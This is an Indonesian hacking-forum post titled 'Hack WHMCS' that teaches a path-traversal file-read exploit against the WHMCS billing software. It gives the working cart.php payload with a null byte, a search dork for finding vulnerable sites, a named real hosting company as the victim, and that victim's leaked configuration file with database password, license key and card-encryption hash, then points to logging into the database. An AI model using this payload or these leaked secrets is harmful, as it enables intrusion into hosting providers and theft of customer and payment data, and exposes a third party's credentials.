Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

Hack WHMCS

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Hack WHMCS

Postby djrhiby » Sun Feb 26, 2012 8:18 pm

:roll: salam kenal neh gan mungkin ini baru pertama kali saya share ya kali ini saya mau share tentang
Hack WHMCS ??? waduuhh emang nya gimana ya :lol: di dunia ini tidak ada security yang 100% menurut saya ya gan :geek: totur ini juga butuh kesabaran :roll: jadi jangan terlalu nafsu ya gan :lol: ok deh kita ke take point aja ya
semoga gak repost ini
Exploiti Powered by whmcs
/cart.php?a=
cart.php?a=test&templatefile=../../../configuration.php%00


untuk dork nya saya biasa memakai ini gan
inurl:whmcs/cart.php?a=

mungkin dork bisa dengan imajinasi kalian :lol:
untuk korban saya saya kasih deh buat pembelajaran saja
Code: Select all
https://www.600host.net/billing/cart.php


tambahkan aja belakang cart.php ganti dengan exploit ini
Code: Select all
cart.php?a=test&templatefile=../../../configuration.php%00

ntar hasil nya akan begini gan
Code: Select all
https://www.600host.net/billing/cart.php?a=test&templatefile=../../../configuration.php

kalau sudah enter tampilan akan kosong
contoh gambar
Image

nah kalau sudah kita tekan CTRL+U kita lihat di bagian ini
Image

code di bagian ini
Code: Select all
<?php
$license="c82f91de790f";
$db_host = "localhost";
$db_username = "host_whmcs";
$db_password = "}|jkxpHl-pU6";
$db_name = "host_whmcs";
$cc_encryption_hash = "gyD5g3OMqdMlszfhWiKAjzwxTQByVNu1bYWhRBT8FwkXVp5IyF9H5w4OcwdX9xPa";
$templates_compiledir = "templates_c/";
$display_errors=true;
?>


taraaa kita berhasil mendapatkan database :lol:
selanjut nya bisa kita menggunakan phpmyadmin / filezilla
semoga totur ini bermanfaat

[email protected]
Image
djrhiby
 
Posts: 20
Joined: Thu Feb 23, 2012 8:23 pm

leave a comment

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 2 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id